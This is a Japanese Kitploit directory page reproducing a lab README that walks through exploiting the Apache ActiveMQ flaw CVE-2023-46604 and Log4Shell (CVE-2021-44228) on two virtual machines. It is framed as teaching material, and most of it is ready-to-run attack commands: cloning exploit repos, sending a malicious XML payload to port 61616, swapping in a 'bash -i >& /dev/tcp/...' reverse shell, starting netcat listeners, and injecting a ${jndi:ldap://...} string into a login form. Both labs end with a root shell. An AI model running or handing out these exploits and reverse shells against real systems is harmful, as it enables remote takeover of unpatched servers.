Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-Lab — CVE-2021-44228 および CVE-2023-46604 の脆弱性を悪用するための手順 | Kitploit
ツール/GitHubGitHub/dcm2406/cve-lab
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubdcm2406/cve-lab

CVE-Lab

CVE-2021-44228 および CVE-2023-46604 の脆弱性を悪用するための手順

リポジトリを見る
242年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-46604 ラボ

このラボでは、CVE-2023-46604 の脆弱性を悪用する方法を説明します。

謝辞

  • Apache ActiveMQ
  • CVE-2023-46604

環境

このラボでは、2台の仮想マシンのインストールが必要です。Kali Linux 2023.4 マシンと Ubuntu 22.04.3 LTS マシンの2台です。以下からダウンロードできます。

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 Windows用
  • VMware-workstation-17.5.0 Linux用

モデルとシステム要件

Kali Linux マシンの場合:

git をインストール

root@kitploit:~
$sudo apt install git

gedit をインストール

root@kitploit:~
$sudo apt install gedit

Ubuntu マシンの場合:

git をインストール

root@kitploit:~
$sudo apt install git

openjdk 18 をインストール

root@kitploit:~
$sudo apt install openjdk-18-jdk

ActiveMQ 5.18.2 パッケージをインストール

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

サーバーの構築 (ActiveMQ サービスの起動)

Ubuntu マシンで ターミナルウィンドウを開き、以下のコマンドを実行します:

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

サービスの状態を確認します:

root@kitploit:~
$./activemq status

サービスが正常に起動すると、ターミナル画面に "ActiveMQ Brocker is running" と表示されます。

また、http://127.0.0.1:8161 にアクセスすると、ActiveMQ ブローカーマネージャーを開くことができます。ホスト名、バージョン、ID、稼働時間、その他の情報が表示されます。

エクスプロイト

Kali Linux マシンで

エクスプロイトのプロセスに必要なリソースをダウンロードします:

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

ご覧のとおり、exploit.py と poc.xml の2つのファイルがあります:

  • poc.xml ファイルには、OpenWire プロトコルの脆弱性を悪用する悪意のあるコードが含まれています。
  • exploit.py ファイルは、poc.xml ファイルを HTTP で暗号化し、ターゲットマシン上のブローカーに送信します。

リソースのパスで Web サーバーを起動します:

root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

新しいターミナルウィンドウを開き、exploit.py ファイルを介して poc.xml ファイルをターゲットのサーバーに送信します:

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

コマンドが実行されると、ターゲットマシン上で Calculator アプリケーションが起動します。これにより、脆弱性が正常に悪用されたことが証明されます。続けて、ターゲットマシンを制御するためのリバースシェルを作成します。

新しいターミナルウィンドウを開き、リバースシェルの接続を待ち受けます:

root@kitploit:~
$sudo su
$nc -nlvp 4444

前のターミナルに戻り、poc.xml ファイルを編集します:

root@kitploit:~
$gedit poc.xml

値 gnome-calculator を bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 に置き換えて、ファイルを保存します。

悪意のあるコードを再度送信します:

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

このコマンドの結果、ターゲットマシン上で root シェルを取得できました。ROOTED!!!

CVE-2021-44228 ラボ

謝辞

  • Apache log4j
  • CVE-2023-44228 - log4shell

環境

このラボでは、2台の仮想マシンのインストールが必要です。Kali Linux 2023.4 マシンと Ubuntu 22.04.3 LTS マシンの2台です。以下からダウンロードできます。

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 Windows用
  • VMware-workstation-17.5.0 Linux用

モデルとシステム要件

Kali Linux マシンの場合:

git をインストール

root@kitploit:~
$sudo apt install git

gedit をインストール

root@kitploit:~
$sudo apt install gedit

Ubuntu マシンの場合:

git をインストール

root@kitploit:~
$sudo apt install git

docker をインストール

root@kitploit:~
$sudo apt install docker.io 

Web サーバーの構築

Ubuntu マシンで

ステップ 1: openjdk をダウンロード

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

ステップ 2: Docker ファイルをダウンロードしてビルド

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

上記のコマンドを完了すると、Web サイトが作成されます。Web を閲覧するには、http://<ubuntu_ip>:8080 を使用できます。このチュートリアルでは、アドレスは http://192.168.132.135:8080 のようになります。

エクスプロイト

Kali Linux マシンで、脆弱性を悪用するために必要なリソースをダウンロードします

PoC をダウンロード

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

openjdk をダウンロード

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//move the openjdk file to the directory containing the poc file
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>

$tar -xf jdk-8u20-linux-x64.tar.gz   //unzip the file

新しいターミナルを開き、リバースシェルの接続を待ち受けます:

root@kitploit:~
$sudo su
$nc -nlvp 9001

PoC ファイルを使用して LDAP サービスと HTTP サービスを起動します

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

コマンドは次のような結果を返します

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

ここでは、生成された jndi 値のみに注目します。 Web ブラウザを開き、先ほど作成した Web サイトのアドレスを入力します。 jndi 値を使用してログインします。このとき、netcat のターミナルが接続を受信します。 ROOTED!!!

ドキュメント

CVE 調査レポート

サポート

サポートが必要な場合は、[email protected] までメールしてください。

著者

  • @dcm2406
  • @tCu0n9
ツールをダウンロード